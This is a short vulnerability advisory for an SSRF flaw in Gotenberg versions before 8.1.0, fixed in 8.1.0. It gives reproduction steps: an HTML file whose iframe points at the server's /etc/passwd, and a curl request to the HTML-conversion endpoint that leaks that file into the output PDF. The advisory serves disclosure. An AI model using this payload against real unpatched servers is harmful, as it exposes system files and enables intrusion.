Affected versions of github.com/gotenberg/gotenberg
(<8.1.0) are vulnerable to Server-side Request Forgery (SSRF)
via the /convert/html
endpoint when a request is made to a file via localhost,
such as <iframe src="\\localhost/etc/passwd">
.
- Start Gotenberg:
$ docker run --rm -p 3000:3000 gotenberg/gotenberg:8.0.3 gotenberg
- Create an
index.html
file with the following contents:
<head>
<body>
<iframe src="\\localhost/etc/passwd">
</body>
</head>
- Convert
index.html
to pdf:
$ curl -v \
--request POST 'http://localhost:3000/forms/chromium/convert/html' \
--form 'files=@"index.html"' -o output.pdf
- Open
output.pdf
, it will include the contents of/etc/passwd
.
The issue has been fixed in version 8.1.0 with this commit